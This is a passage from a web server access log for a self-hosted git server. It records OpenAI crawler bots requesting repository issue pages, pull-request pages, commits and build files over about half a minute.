GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fwarn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 27797] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fwarn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 27465] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fwarn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 27778] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs" [Client 74.7.227.38] [Length 18881] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:19:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11319] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:01:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 70538] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71847] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71846] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14323] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:01:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:01:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:01:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 